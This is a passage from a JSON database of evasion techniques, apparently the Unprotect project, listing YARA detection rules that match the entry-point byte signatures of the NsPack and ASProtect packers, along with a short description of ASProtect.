 strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_34_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 196,
            "unprotect_id": "U1415",
            "name": "AsProtect",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ASProtect is a multifunctional EXE packing tool designed for software developers to protect 32-bit applications with in-built application copy protection system.\r\n\r\nIt includes software compression, provides protection methods and tools for software from unauthorized copying, analysis, disassemblers and debuggers.\r\n\r\nASProtect 32 also provides enhanced work with registration keys and the ability to create a single application that can change its functionality or expiration, depending on the entered particular key.",
            "resources": "http://www.aspack.com/asprotect32.html",
            "tags": "asprotect",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 112,
                    "key": "yara_detect_asprotect",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Asprotect",
                    "rule": "rule ASProtect_v123_RC1: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_130824_beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 89 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 05 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v132: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_12_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n        $b = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 }\r\n        $b = { 60 E9 ?? 05 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_10_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 90 5D 81 ED ?? ?? ?? 00 BB ?? ?? ?? 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_V2X_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_MTE_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v21x: 